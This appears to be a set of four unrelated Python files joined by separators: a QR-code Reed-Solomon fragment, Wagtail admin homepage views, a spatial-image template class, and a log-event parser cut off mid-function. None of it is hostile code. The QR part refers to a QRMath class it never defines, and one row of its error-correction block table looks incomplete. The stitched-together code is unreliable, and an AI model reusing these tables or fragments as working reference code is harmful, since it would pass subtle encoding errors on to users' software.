EXP_TABLE = list(range(256))
LOG_TABLE = list(range(256))

for i in range(8):
    EXP_TABLE[i] = 1 << i
for i in range(8, 256):
    EXP_TABLE[i] = (EXP_TABLE[i - 4] ^ EXP_TABLE[i - 5]
                    ^ EXP_TABLE[i - 6] ^ EXP_TABLE[i - 8])
# Invert the antilog table (exp cycles with period 255, so stop at 255).
for i in range(255):
    LOG_TABLE[EXP_TABLE[i]] = i
class QRPolynomial:
    """Polynomial over GF(256); coefficients stored highest-order first."""

    def __init__(self, num, shift):
        """Build from coefficient list `num`, appending `shift` zero terms.

        Leading zero coefficients are stripped.  Raises Exception for an
        empty coefficient list.
        """
        if len(num) == 0:
            # Bug fix: the original read ``num.length`` (a JavaScript-ism),
            # which raised AttributeError instead of the intended message.
            raise Exception("%d/%d" % (len(num), shift))
        offset = 0
        while offset < len(num) and num[offset] == 0:
            offset += 1
        self.num = [0] * (len(num) - offset + shift)
        for i in range(len(num) - offset):
            self.num[i] = num[i + offset]

    def get(self, index):
        """Return the coefficient at `index`."""
        return self.num[index]

    def getLength(self):
        """Return the number of stored coefficients."""
        return len(self.num)

    def multiply(self, e):
        """Return self * e over GF(256) (log/antilog multiplication)."""
        num = [0] * (self.getLength() + e.getLength() - 1)
        for i in range(self.getLength()):
            for j in range(e.getLength()):
                num[i + j] ^= QRMath.gexp(QRMath.glog(self.get(i)) + QRMath.glog(e.get(j)))
        return QRPolynomial(num, 0)

    def mod(self, e):
        """Return self mod e (polynomial remainder) over GF(256)."""
        if self.getLength() - e.getLength() < 0:
            return self
        # Scale factor aligning e's leading term with ours.
        ratio = QRMath.glog(self.get(0)) - QRMath.glog(e.get(0))
        num = [self.get(i) for i in range(self.getLength())]
        for i in range(e.getLength()):
            num[i] ^= QRMath.gexp(QRMath.glog(e.get(i)) + ratio)
        # Recursive call; each step strips the (now zero) leading term,
        # so the degree shrinks until it is below e's.
        return QRPolynomial(num, 0).mod(e)
class QRRSBlock:
    """Reed-Solomon block layout for a QR symbol version / EC level.

    RS_BLOCK_TABLE holds 4 rows per version (EC levels L, M, Q, H), each a
    flattened sequence of (block count, total codewords, data codewords)
    triples — one triple per block group.
    """

    RS_BLOCK_TABLE = [
        #// L
        #// M
        #// Q
        #// H
        # version 1
        [1, 26, 19],
        [1, 26, 16],
        [1, 26, 13],
        [1, 26, 9],
        # version 2
        [1, 44, 34],
        [1, 44, 28],
        [1, 44, 22],
        [1, 44, 16],
        # version 3
        [1, 70, 55],
        [1, 70, 44],
        [2, 35, 17],
        [2, 35, 13],
        # version 4
        [1, 100, 80],
        [2, 50, 32],
        [2, 50, 24],
        [4, 25, 9],
        # version 5
        [1, 134, 108],
        [2, 67, 43],
        [2, 33, 15, 2, 34, 16],
        [2, 33, 11, 2, 34, 12],
        # version 6
        [2, 86, 68],
        [4, 43, 27],
        [4, 43, 19],
        [4, 43, 15],
        # version 7
        [2, 98, 78],
        [4, 49, 31],
        [2, 32, 14, 4, 33, 15],
        [4, 39, 13, 1, 40, 14],
        # version 8
        [2, 121, 97],
        [2, 60, 38, 2, 61, 39],
        [4, 40, 18, 2, 41, 19],
        [4, 40, 14, 2, 41, 15],
        # version 9
        [2, 146, 116],
        [3, 58, 36, 2, 59, 37],
        [4, 36, 16, 4, 37, 17],
        [4, 36, 12, 4, 37, 13],
        # version 10
        [2, 86, 68, 2, 87, 69],
        [4, 69, 43, 1, 70, 44],
        [6, 43, 19, 2, 44, 20],
        [6, 43, 15, 2, 44, 16],
        # version 11
        [4, 101, 81],
        [1, 80, 50, 4, 81, 51],
        [4, 50, 22, 4, 51, 23],
        [3, 36, 12, 8, 37, 13],
        # version 12
        [2, 116, 92, 2, 117, 93],
        [6, 58, 36, 2, 59, 37],
        [4, 46, 20, 6, 47, 21],
        [7, 42, 14, 4, 43, 15],
        # version 13
        [4, 133, 107],
        [8, 59, 37, 1, 60, 38],
        [8, 44, 20, 4, 45, 21],
        [12, 33, 11, 4, 34, 12],
        # version 14
        [3, 145, 115, 1, 146, 116],
        [4, 64, 40, 5, 65, 41],
        [11, 36, 16, 5, 37, 17],
        [11, 36, 12, 5, 37, 13],
        # version 15
        [5, 109, 87, 1, 110, 88],
        [5, 65, 41, 5, 66, 42],
        [5, 54, 24, 7, 55, 25],
        [11, 36, 12],
        # version 16
        [5, 122, 98, 1, 123, 99],
        [7, 73, 45, 3, 74, 46],
        [15, 43, 19, 2, 44, 20],
        [3, 45, 15, 13, 46, 16],
        # version 17
        [1, 135, 107, 5, 136, 108],
        [10, 74, 46, 1, 75, 47],
        [1, 50, 22, 15, 51, 23],
        [2, 42, 14, 17, 43, 15],
        # version 18
        [5, 150, 120, 1, 151, 121],
        [9, 69, 43, 4, 70, 44],
        [17, 50, 22, 1, 51, 23],
        [2, 42, 14, 19, 43, 15],
        # version 19
        [3, 141, 113, 4, 142, 114],
        [3, 70, 44, 11, 71, 45],
        [17, 47, 21, 4, 48, 22],
        [9, 39, 13, 16, 40, 14],
        # version 20
        [3, 135, 107, 5, 136, 108],
        [3, 67, 41, 13, 68, 42],
        [15, 54, 24, 5, 55, 25],
        [15, 43, 15, 10, 44, 16],
        # version 21
        [4, 144, 116, 4, 145, 117],
        [17, 68, 42],
        [17, 50, 22, 6, 51, 23],
        [19, 46, 16, 6, 47, 17],
        # version 22
        [2, 139, 111, 7, 140, 112],
        [17, 74, 46],
        [7, 54, 24, 16, 55, 25],
        [34, 37, 13],
        # version 23
        [4, 151, 121, 5, 152, 122],
        [4, 75, 47, 14, 76, 48],
        [11, 54, 24, 14, 55, 25],
        [16, 45, 15, 14, 46, 16],
        # version 24
        [6, 147, 117, 4, 148, 118],
        [6, 73, 45, 14, 74, 46],
        [11, 54, 24, 16, 55, 25],
        [30, 46, 16, 2, 47, 17],
        # version 25
        [8, 132, 106, 4, 133, 107],
        [8, 75, 47, 13, 76, 48],
        [7, 54, 24, 22, 55, 25],
        [22, 45, 15, 13, 46, 16],
        # version 26
        [10, 142, 114, 2, 143, 115],
        [19, 74, 46, 4, 75, 47],
        [28, 50, 22, 6, 51, 23],
        [33, 46, 16, 4, 47, 17],
        # version 27
        [8, 152, 122, 4, 153, 123],
        [22, 73, 45, 3, 74, 46],
        [8, 53, 23, 26, 54, 24],
        [12, 45, 15, 28, 46, 16],
        # version 28
        [3, 147, 117, 10, 148, 118],
        [3, 73, 45, 23, 74, 46],
        [4, 54, 24, 31, 55, 25],
        [11, 45, 15, 31, 46, 16],
        # version 29
        [7, 146, 116, 7, 147, 117],
        [21, 73, 45, 7, 74, 46],
        [1, 53, 23, 37, 54, 24],
        [19, 45, 15, 26, 46, 16],
        # version 30
        [5, 145, 115, 10, 146, 116],
        [19, 75, 47, 10, 76, 48],
        [15, 54, 24, 25, 55, 25],
        [23, 45, 15, 25, 46, 16],
        # version 31
        [13, 145, 115, 3, 146, 116],
        [2, 74, 46, 29, 75, 47],
        [42, 54, 24, 1, 55, 25],
        [23, 45, 15, 28, 46, 16],
        # version 32
        [17, 145, 115],
        [10, 74, 46, 23, 75, 47],
        [10, 54, 24, 35, 55, 25],
        [19, 45, 15, 35, 46, 16],
        # version 33
        [17, 145, 115, 1, 146, 116],
        [14, 74, 46, 21, 75, 47],
        [29, 54, 24, 19, 55, 25],
        [11, 45, 15, 46, 46, 16],
        # version 34
        [13, 145, 115, 6, 146, 116],
        [14, 74, 46, 23, 75, 47],
        [44, 54, 24, 7, 55, 25],
        [59, 46, 16, 1, 47, 17],
        # version 35
        [12, 151, 121, 7, 152, 122],
        [12, 75, 47, 26, 76, 48],
        [39, 54, 24, 14, 55, 25],
        [22, 45, 15, 41, 46, 16],
        # version 36
        [6, 151, 121, 14, 152, 122],
        [6, 75, 47, 34, 76, 48],
        [46, 54, 24, 10, 55, 25],
        [2, 45, 15, 64, 46, 16],
        # version 37
        [17, 152, 122, 4, 153, 123],
        [29, 74, 46, 14, 75, 47],
        [49, 54, 24, 10, 55, 25],
        [24, 45, 15, 46, 46, 16],
        # version 38
        [4, 152, 122, 18, 153, 123],
        [13, 74, 46, 32, 75, 47],
        [48, 54, 24, 14, 55, 25],
        [42, 45, 15, 32, 46, 16],
        # version 39
        [20, 147, 117, 4, 148, 118],
        [40, 75, 47, 7, 76, 48],
        [43, 54, 24, 22, 55, 25],
        [10, 45, 15, 67, 46, 16],
        # version 40
        [19, 148, 118, 6, 149, 119],
        [18, 75, 47, 31, 76, 48],
        [34, 54, 24, 34, 55, 25],
        [20, 45, 15, 61, 46, 16]
    ]

    def __init__(self, totalCount, dataCount):
        # totalCount: data + error-correction codewords in this block;
        # dataCount: data codewords only.
        self.totalCount = totalCount
        self.dataCount = dataCount

    @staticmethod
    def getRSBlocks(typeNumber, errorCorrectLevel):
        """Return the list of QRRSBlock instances for a version / EC level.

        Raises Exception for an unknown error-correction level.
        """
        rsBlock = QRRSBlock.getRsBlockTable(typeNumber, errorCorrectLevel)
        if rsBlock is None:
            # Bug fix: format the message — the original concatenated ints
            # onto a str, raising TypeError instead of this diagnostic.
            raise Exception("bad rs block @ typeNumber:%s/errorCorrectLevel:%s"
                            % (typeNumber, errorCorrectLevel))
        # Bug fix: floor division keeps the group count an int (plain "/"
        # yields a float under Python 3, which range() rejects).
        length = len(rsBlock) // 3
        blocks = []
        for i in range(length):
            count = rsBlock[i * 3 + 0]
            totalCount = rsBlock[i * 3 + 1]
            dataCount = rsBlock[i * 3 + 2]
            for j in range(count):
                blocks.append(QRRSBlock(totalCount, dataCount))
        return blocks

    @staticmethod
    def getRsBlockTable(typeNumber, errorCorrectLevel):
        """Return the raw table row for (version, EC level), or None if the
        error-correction level is not one of L/M/Q/H."""
        if errorCorrectLevel == QRErrorCorrectLevel.L:
            return QRRSBlock.RS_BLOCK_TABLE[(typeNumber - 1) * 4 + 0]
        elif errorCorrectLevel == QRErrorCorrectLevel.M:
            return QRRSBlock.RS_BLOCK_TABLE[(typeNumber - 1) * 4 + 1]
        elif errorCorrectLevel == QRErrorCorrectLevel.Q:
            return QRRSBlock.RS_BLOCK_TABLE[(typeNumber - 1) * 4 + 2]
        elif errorCorrectLevel == QRErrorCorrectLevel.H:
            return QRRSBlock.RS_BLOCK_TABLE[(typeNumber - 1) * 4 + 3]
        else:
            return None
class QRBitBuffer:
    """Append-only, MSB-first bit buffer backed by a list of byte values."""

    def __init__(self):
        self.buffer = []   # byte values, filled 8 bits at a time
        self.length = 0    # number of bits written so far

    def __repr__(self):
        return ".".join([str(n) for n in self.buffer])

    def get(self, index):
        """Return bit `index` (0-based from the start) as a bool.

        Bug fixes: use integer floor division (math.floor returns a float
        under Python 3 and cannot index a list), drop the stray debug
        print, and compute the value once instead of twice.
        """
        bufIndex = index // 8
        return ((self.buffer[bufIndex] >> (7 - index % 8)) & 1) == 1

    def put(self, num, length):
        """Append the low `length` bits of `num`, most significant first."""
        for i in range(length):
            self.putBit(((num >> (length - i - 1)) & 1) == 1)

    def getLengthInBits(self):
        """Return the number of bits stored."""
        return self.length

    def putBit(self, bit):
        """Append a single bit (truthy -> 1)."""
        bufIndex = self.length // 8
        if len(self.buffer) <= bufIndex:
            self.buffer.append(0)
        if bit:
            self.buffer[bufIndex] |= (0x80 >> (self.length % 8))
        self.length += 1
| |
import itertools
from django.conf import settings
from django.contrib.auth import get_user_model
from django.contrib.auth.decorators import permission_required
from django.db import connection
from django.db.models import Max, Q
from django.http import Http404, HttpResponse
from django.template.loader import render_to_string
from django.template.response import TemplateResponse
from wagtail.admin.navigation import get_site_for_user
from wagtail.admin.site_summary import SiteSummaryPanel
from wagtail.core import hooks
from wagtail.core.models import (
Page, PageRevision, TaskState, UserPagePermissionsProxy, WorkflowState)
# Resolve the project's configured user model once at import time; used by
# RecentEditsPanel's raw SQL to prepare the user's primary-key value.
User = get_user_model()
# Panels for the homepage
class UpgradeNotificationPanel:
    """Homepage panel prompting superusers to check for Wagtail updates."""
    name = 'upgrade_notification'
    order = 100

    def __init__(self, request):
        self.request = request

    def render(self):
        user = self.request.user
        check_enabled = getattr(settings, "WAGTAIL_ENABLE_UPDATE_CHECK", True)
        if not (user.is_superuser and check_enabled):
            return ""
        return render_to_string(
            'wagtailadmin/home/upgrade_notification.html', {},
            request=self.request)
class IE11WarningPanel:
    """Homepage panel rendering the Internet Explorer 11 warning template."""
    name = 'ie11_warning'
    order = 110

    def __init__(self, request):
        self.request = request

    def render(self):
        context = {}
        return render_to_string(
            'wagtailadmin/home/ie11_warning.html', context,
            request=self.request)
class PagesForModerationPanel:
    """Homepage panel listing page revisions awaiting this user's moderation."""
    name = 'pages_for_moderation'
    order = 200

    def __init__(self, request):
        self.request = request
        permission_proxy = UserPagePermissionsProxy(request.user)
        revisions = permission_proxy.revisions_for_moderation()
        self.page_revisions_for_moderation = (
            revisions.select_related('page', 'user').order_by('-created_at'))

    def render(self):
        context = {
            'page_revisions_for_moderation': self.page_revisions_for_moderation,
        }
        return render_to_string(
            'wagtailadmin/home/pages_for_moderation.html', context,
            request=self.request)
class UserPagesInWorkflowModerationPanel:
    """Homepage panel showing the user's pages currently in workflow moderation."""
    name = 'user_pages_in_workflow_moderation'
    order = 210

    def __init__(self, request):
        self.request = request
        # In-progress workflow states either requested by the user or on
        # pages the user owns.
        mine = Q(page__owner=request.user) | Q(requested_by=request.user)
        states = WorkflowState.objects.active().filter(mine)
        states = states.select_related(
            'page', 'current_task_state', 'current_task_state__task',
            'current_task_state__page_revision',
        )
        self.workflow_states = states.order_by('-current_task_state__started_at')

    def render(self):
        context = {'workflow_states': self.workflow_states}
        return render_to_string(
            'wagtailadmin/home/user_pages_in_workflow_moderation.html',
            context, request=self.request)
class WorkflowPagesToModeratePanel:
    """Homepage panel listing workflow task states the user can act on."""
    name = 'workflow_pages_to_moderate'
    order = 220

    def __init__(self, request):
        self.request = request
        reviewable = (
            TaskState.objects.reviewable_by(request.user)
            .select_related('page_revision', 'task', 'page_revision__page')
            .order_by('-started_at')
        )
        # Each entry: (task state, available actions, all task statuses).
        self.states = []
        for state in reviewable:
            actions = state.task.specific.get_actions(
                page=state.page_revision.page, user=request.user)
            statuses = state.workflow_state.all_tasks_with_status()
            self.states.append((state, actions, statuses))

    def render(self):
        context = {'states': self.states}
        return render_to_string(
            'wagtailadmin/home/workflow_pages_to_moderate.html', context,
            request=self.request)
class LockedPagesPanel:
    """Homepage panel showing pages the current user has locked."""
    name = 'locked_pages'
    order = 300

    def __init__(self, request):
        self.request = request

    def render(self):
        user = self.request.user
        context = {
            'locked_pages': Page.objects.filter(locked=True, locked_by=user),
            'can_remove_locks': UserPagePermissionsProxy(user).can_remove_locks(),
        }
        return render_to_string(
            'wagtailadmin/home/locked_pages.html', context,
            request=self.request)
class RecentEditsPanel:
    """Homepage panel listing the current user's most recently edited pages.

    Shows the latest revision per page, newest first, limited by the
    WAGTAILADMIN_RECENT_EDITS_LIMIT setting (default 5).
    """
    name = 'recent_edits'
    order = 250

    def __init__(self, request):
        self.request = request
        # Last n edited pages
        edit_count = getattr(settings, 'WAGTAILADMIN_RECENT_EDITS_LIMIT', 5)
        if connection.vendor == 'mysql':
            # MySQL can't handle the subselect created by the ORM version -
            # it fails with "This version of MySQL doesn't yet support 'LIMIT & IN/ALL/ANY/SOME subquery'"
            last_edits = PageRevision.objects.raw(
                """
                SELECT wp.* FROM
                wagtailcore_pagerevision wp JOIN (
                SELECT max(created_at) AS max_created_at, page_id FROM
                wagtailcore_pagerevision WHERE user_id = %s GROUP BY page_id ORDER BY max_created_at DESC LIMIT %s
                ) AS max_rev ON max_rev.max_created_at = wp.created_at ORDER BY wp.created_at DESC
                """, [
                    User._meta.pk.get_db_prep_value(self.request.user.pk, connection),
                    edit_count
                ]
            )
        else:
            # Latest revision date per page for this user, newest first.
            last_edits_dates = (PageRevision.objects.filter(user=self.request.user)
                                .values('page_id').annotate(latest_date=Max('created_at'))
                                .order_by('-latest_date').values('latest_date')[:edit_count])
            last_edits = PageRevision.objects.filter(created_at__in=last_edits_dates).order_by('-created_at')
        page_keys = [pr.page_id for pr in last_edits]
        pages = Page.objects.specific().in_bulk(page_keys)
        self.last_edits = [
            # Perf fix: use the already-loaded page_id instead of
            # review.page.pk, which issued one extra query per revision.
            [review, pages.get(review.page_id)] for review in last_edits
        ]

    def render(self):
        return render_to_string('wagtailadmin/home/recent_edits.html', {
            'last_edits': list(self.last_edits),
        }, request=self.request)
def home(request):
    """Render the Wagtail admin homepage with its summary panels."""
    panels = [
        SiteSummaryPanel(request),
        UpgradeNotificationPanel(request),
        IE11WarningPanel(request),
        WorkflowPagesToModeratePanel(request),
        PagesForModerationPanel(request),
        UserPagesInWorkflowModerationPanel(request),
        RecentEditsPanel(request),
        LockedPagesPanel(request),
    ]

    # Let registered hooks add, remove or mutate panels in place.
    for hook in hooks.get_hooks('construct_homepage_panels'):
        hook(request, panels)

    site_details = get_site_for_user(request.user)
    context = {
        'root_page': site_details['root_page'],
        'root_site': site_details['root_site'],
        'site_name': site_details['site_name'],
        'panels': sorted(panels, key=lambda p: p.order),
        'user': request.user,
    }
    return TemplateResponse(request, "wagtailadmin/home.html", context)
def error_test(request):
    """Deliberately raise, so error handling/reporting can be exercised end to end."""
    raise Exception("This is a test of the emergency broadcast system.")
@permission_required('wagtailadmin.access_admin', login_url='wagtailadmin_login')
def default(request):
    """
    Catch-all for admin-prefixed URLs that match no actual Wagtail view.

    Called whenever a request comes in with the correct prefix (eg /admin/) but
    doesn't actually correspond to a Wagtail view.
    For authenticated users, it'll raise a 404 error. Anonymous users will be
    redirected to the login page by the permission_required decorator.
    """
    raise Http404
# Rendered icon-sprite markup, built lazily on first use and cached for
# the lifetime of the process.
_icons_html = None


def icons():
    """Return the rendered icon sprite HTML, building and caching it once."""
    global _icons_html
    if _icons_html is None:
        icon_hooks = hooks.get_hooks('register_icons')
        collected = itertools.chain.from_iterable(hook([]) for hook in icon_hooks)
        all_icons = sorted(collected)
        _icons_html = render_to_string(
            "wagtailadmin/shared/icons.html", {'icons': all_icons})
    return _icons_html
def sprite(request):
    """Serve the cached SVG icon sprite markup as a plain HTTP response."""
    return HttpResponse(icons())
| |
''' Very simple spatial image class
The image class maintains the association between a 3D (or greater)
array, and an affine transform that maps voxel coordinates to some real
world space. It also has a ``header`` - some standard set of meta-data
that is specific to the image format - and ``extra`` - a dictionary
container for any other metadata.
It has attributes:
* extra
methods:
* .get_data()
* .get_affine()
* .get_header()
* .get_shape()
* .set_shape(shape)
* .to_filename(fname) - writes data to filename(s) derived from
``fname``, where the derivation may differ between formats.
* to_files() - save image to files with which the image is already
associated. Or ``img.to_files(files)`` saves to the files passed.
classmethods:
* from_filename(fname) - make instance by loading from filename
* instance_to_filename(img, fname) - save ``img`` instance to
filename ``fname``.
There are several ways of writing data.
=======================================
There is the usual way, which is the default::
img.to_filename(fname)
and that is, to take the data encapsulated by the image and cast it to
the datatype the header expects, setting any available header scaling
into the header to help the data match.
You can load the data into an image from file with::
img.from_filename(fname)
The image stores its associated files in a rather secretive way. In
order to just save an image, for which you know there is an associated
filename, or other storage, you can do::
img.to_files()
alternatively, you can pass in the needed files yourself, into this
method, as an argument.
You can get the data out again with::
img.get_data(fileobj)
Less commonly, for some image types that support it, you might want to
fetch out the unscaled array via the header::
unscaled_data = img.get_unscaled_data()
Analyze-type images (including nifti) support this, but others may not
(MINC, for example).
Sometimes you might want to avoid any loss of precision by making the
data type the same as the input::
hdr = img.get_header()
hdr.set_data_dtype(data.dtype)
img.to_filename(fname)
'''
import warnings
class SpatialImage(object):
    ''' Template class for spatial images

    Associates a data array with an affine mapping voxel coordinates to
    world coordinates, plus a format-specific ``header`` and an ``extra``
    dict for any other metadata.
    '''
    # Callable used to build a header when none is given; format
    # subclasses replace this with their own header class.
    _header_maker = dict

    def __init__(self, data, affine, header=None, extra=None):
        ''' Initialize image from data and affine

        Parameters
        ----------
        data : array-like
            image data
        affine : array-like
            mapping from voxel to world coordinates
        header : None or mapping, optional
            format-specific metadata; keys the header type does not
            recognize spill into ``extra``
        extra : None or dict, optional
            extra metadata container; defaults to a fresh empty dict
        '''
        if extra is None:
            extra = {}
        self._data = data
        self._affine = affine
        self.extra = extra
        self._set_header(header)
        self._files = {}

    def __str__(self):
        shape = self.get_shape()
        affine = self.get_affine()
        return '\n'.join((
            str(self.__class__),
            'data shape %s' % (shape,),
            'affine: ',
            '%s' % affine,
            'metadata:',
            '%s' % self._header))

    def get_data(self):
        ''' Return the image data '''
        return self._data

    def get_shape(self):
        ''' Return shape of the data, or None when there is no data

        Bug fix: compare against None explicitly — truth-testing a numpy
        array of more than one element raises ValueError.
        '''
        if self._data is not None:
            return self._data.shape

    def get_data_dtype(self):
        raise NotImplementedError

    def set_data_dtype(self, dtype):
        raise NotImplementedError

    def get_affine(self):
        ''' Return the voxel-to-world affine '''
        return self._affine

    def get_header(self):
        ''' Return the metadata header '''
        return self._header

    def _set_header(self, header=None):
        ''' Install `header`, copying recognized keys into the new header
        and spilling unrecognized ones into ``self.extra`` '''
        if header is None:
            self._header = self._header_maker()
            return
        # we need to replicate the endianness, for the case where we are
        # creating an image from files, and we have not yet loaded the
        # data. In that case we need to have the header maintain its
        # endianness to get the correct interpretation of the data
        self._header = self._header_maker(endianness=header.endianness)
        for key, value in header.items():
            if key in self._header:
                self._header[key] = value
            elif key not in self.extra:
                self.extra[key] = value

    @classmethod
    def from_filename(klass, filename):
        ''' Load an instance from file(s) implied by `filename` '''
        files = klass.filespec_to_files(filename)
        return klass.from_files(files)

    @classmethod
    def from_filespec(klass, img, filespec):
        ''' Deprecated alias for ``from_filename`` '''
        warnings.warn('``from_filespec`` class method is deprecated\n'
                      'Please use the ``from_filename`` class method '
                      'instead',
                      DeprecationWarning)
        # Bug fix: the original called klass.from_filespec(filespec),
        # re-entering this method with the wrong arguments instead of
        # delegating to from_filename.
        return klass.from_filename(filespec)

    @classmethod
    def from_files(klass, files):
        # Bug fix: from_filename calls this as ``klass.from_files(files)``,
        # so it must be a classmethod for subclasses to override sanely.
        raise NotImplementedError

    @staticmethod
    def filespec_to_files(filespec):
        raise NotImplementedError

    def to_filename(self, filename):
        ''' Write image to files implied by filename string

        Parameters
        ----------
        filename : str
            filename to which to save image. We will parse `filename`
            with ``filespec_to_files`` to work out names for image,
            header etc.

        Returns
        -------
        None
        '''
        files = self.filespec_to_files(filename)
        self.to_files(files)

    def to_filespec(self, filename):
        ''' Deprecated alias for ``to_filename`` '''
        warnings.warn('``to_filespec`` is deprecated, please '
                      'use ``to_filename`` instead',
                      DeprecationWarning)
        self.to_filename(filename)

    def to_files(self, files=None):
        raise NotImplementedError

    @classmethod
    def load(klass, filename):
        ''' Alias for ``from_filename`` '''
        return klass.from_filename(filename)

    @classmethod
    def save(klass, img, filename):
        ''' Deprecated; use ``to_filename`` or the module-level save '''
        warnings.warn('``save`` class method is deprecated\n'
                      'You probably want the ``to_filename`` instance '
                      'method, or the module-level ``save`` function',
                      DeprecationWarning)
        klass.instance_to_filename(img, filename)

    @classmethod
    def instance_to_filename(klass, img, filename):
        ''' Save `img` in our own format, to name implied by `filename`

        This is a class method

        Parameters
        ----------
        img : ``spatialimage`` instance
            In fact, an object with the API of ``spatialimage`` -
            specifically ``get_data``, ``get_affine``, ``get_header`` and
            ``extra``.
        filename : str
            Filename, implying name to which to save image.
        '''
        img = klass.from_image(img)
        img.to_filename(filename)

    @classmethod
    def from_image(klass, img):
        ''' Create new instance of own class from `img`

        This is a class method.  (The original file also defined a dead
        ``from_image`` stub earlier in the class; this definition was the
        effective one and the stub has been removed.)

        Parameters
        ----------
        img : ``spatialimage`` instance
            In fact, an object with the API of ``spatialimage`` -
            specifically ``get_data``, ``get_affine``, ``get_header`` and
            ``extra``.

        Returns
        -------
        cimg : ``spatialimage`` instance
            Image, of our own class
        '''
        return klass(img.get_data(),
                     img.get_affine(),
                     img.get_header(),
                     img.extra)
| |
#
# $LicenseInfo:firstyear=2010&license=mit$
#
# Copyright (c) 2010, Linden Research, Inc.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
# $/LicenseInfo$
#
import heapq
import re
import sys
from mergetools import imerge
from timestamp import TimeStamp
__all__ = [
'Event',
'CoalescedEvent',
'Sequence',
'parse_stanza',
'EventReader',
'input_events',
'FollowSequences',
'CoalesceSequences'
]
# Stanza header line: "<epoch seconds>\t<addr>\t<source>\t<state>".
headerRE = re.compile(r'^(\d+\.\d+)\t([\d.:]+)\t(\S+)\t(\w+)$')
# Stanza terminator: a line of three or more asterisks.
breakRE = re.compile(r'^\*{3,}$')
class Event(object):
    """One parsed log stanza: a timestamped, per-id state transition with a body."""
    # state values
    Query = 'QueryStart'
    Response = 'QueryResponse'
    End = 'Quit'
    def __init__(self, time, id, source, state, body):
        # Normalize `time` to a TimeStamp so arithmetic/comparison work.
        self.time = time
        if type(time) is not TimeStamp:
            self.time = TimeStamp(time)
        self.id = id
        self.source = source
        self.state = state
        self.body = body
    def __cmp__(self, other):
        # Python 2 ordering: by time, with Quit events sorting after
        # non-Quit events at the same instant so sequences end last.
        c = cmp(self.time, other.time)
        if c == 0:
            if self.state == "Quit" and other.state != "Quit":
                return 1
            if self.state != "Quit" and other.state == "Quit":
                return -1
        return c
    def __str__(self):
        return ("%s\t%s\t%s\t%s\n%s\n**************************************\n"
            % (self.time, self.id, self.source, self.state, self.body))
    def events(self):
        """Split a coalesced body ("time:body" chunks joined by "\\n+++\\n")
        back into individual Event objects."""
        es = []
        for event in self.body.split("\n+++\n"):
            parts = event.split(":", 1)
            if len(parts) == 2:
                (time, body) = parts
                status = Event.Query
                if body == "Quit":
                    status = Event.End
                es.append(Event(time, self.id, self.source, status, body))
        return es
class CoalescedEvent(Event):
    """Accumulates a single id's events into one combined body, with
    optional staleness (shelf_life) and absolute (max_life) expiry times."""
    Sequence = 'Sequence'
    def __init__(self, shelf_life=None, max_life=None):
        # Identity fields are filled in by the first add().
        self.time = None
        self.id = None
        self.source = None
        self.state = CoalescedEvent.Sequence
        self.body = ""
        self.ended = False
        self.lasttime = None
        self.staletime = None   # lasttime + shelf_life, refreshed per add()
        self.maxtime = None     # time of first event + max_life
        self.shelf_life = None
        if shelf_life:
            self.shelf_life = TimeStamp(shelf_life)
        self.max_life = None
        if max_life:
            self.max_life = TimeStamp(max_life)
    def add(self, event):
        """Append `event` to the body, updating identity/expiry bookkeeping."""
        if self.time is None:
            # First event: adopt its identity and fix the max-life deadline.
            self.time = event.time
            if self.max_life:
                self.maxtime = self.time + self.max_life
            self.id = event.id
            self.source = event.source
        self.lasttime = event.time
        if self.shelf_life:
            self.staletime = self.lasttime + self.shelf_life
        if not event.state == Event.End:
            self.body += "%s:%s\n+++\n" % (event.time, event.body)
        else:
            self.body += "%s:Quit\n+++\n" % (event.time)
            self.ended = True
    def endIfNeeded(self):
        """Synthesize a Quit entry at the last-seen time if none arrived."""
        if not self.ended:
            self.add(Event(self.lasttime, self.id, self.source,
                    Event.End, 'Quit'))
def parse_stanza(input):
    """Read the next stanza from `input` and return it as an Event.

    Lines are skipped until one matches the header pattern; returns None
    if EOF is reached first.  The body runs until a break line or EOF.
    """
    while True:
        line = input.readline()
        if line == '':  # empty string means EOF
            return None
        match = headerRE.match(line)
        if match:
            break
    (time, id, source, state) = match.groups()
    body_parts = []
    while True:
        line = input.readline()
        if line == '' or breakRE.match(line):
            break
        body_parts.append(line)
    return Event(float(time), id, source, state, ''.join(body_parts))
class Sequence(object):
    """Running statistics for one id's stream of events."""

    def __init__(self):
        self._count = 0
        self._time_start = None
        self._last_event = None

    def note(self, event):
        """Record one event in this sequence."""
        self._count += 1
        if self._time_start is None:
            self._time_start = event.time
        self._last_event = event

    def count(self):
        """Number of events recorded so far."""
        return self._count

    def time(self):
        """Elapsed time between the first and last recorded events."""
        return self._last_event.time - self._time_start

    def timeto(self, event):
        """Gap from the last recorded event to `event`; None when empty."""
        if self._last_event is None:
            return None
        return event.time - self._last_event.time

    def ended(self):
        """True once an End (Quit) event has been recorded."""
        return self._last_event.state == Event.End

    def generateEnd(self, t=None):
        """Build a synthetic End event for this sequence, at time `t`
        (defaults to the time of the last recorded event)."""
        last = self._last_event
        if t is None:
            t = last.time
        return Event(t, last.id, last.source, Event.End, "")
class EventReader(object):
    """Iterates Events parsed from a stanza-formatted input stream,
    expanding coalesced stanzas into their member events."""

    def __init__(self, input):
        self._input = input

    def __iter__(self):
        stanza = parse_stanza(self._input)
        while stanza is not None:
            if stanza.state == CoalescedEvent.Sequence:
                for member in stanza.events():
                    yield member
            else:
                yield stanza
            stanza = parse_stanza(self._input)
def input_spec_to_file(spec):
    """Return a readable file object for `spec`; '-' means stdin.

    Uses open() rather than the Python-2-only file() builtin, which also
    keeps the function portable to Python 3.
    """
    if spec == '-':
        return sys.stdin
    return open(spec)
def input_events(specs):
    """Return an iterator over events merged (by time) from `specs`;
